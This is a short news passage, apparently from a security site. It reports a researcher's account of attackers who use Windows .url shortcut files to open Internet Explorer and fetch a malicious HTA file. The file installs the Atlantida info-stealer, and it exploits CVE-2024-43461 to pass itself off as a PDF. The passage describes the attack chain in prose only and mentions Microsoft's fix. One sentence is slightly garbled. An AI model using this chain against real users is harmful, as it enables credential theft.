“Specifically, the attackers used special Windows Internet Shortcut (.url extension name) files, which when clicked, call the retired Internet Explorer (IE) to visit a URL controlled by the attacker,” Li explained in a July research report. .
Monitored URLs to download a malicious HTA file and prompt the user to open it. Once opened, the script is used to install the Atlantida info-stealer.
These HTA files also exploit CVE-2024-43461 to hide the HTA file extension and make it appear as a PDF when Windows asks users if the file should be opened. A fix from Microsoft, when applied, will allow Windows to display the actual .hta extension, thereby warning users of malicious downloads.
Source link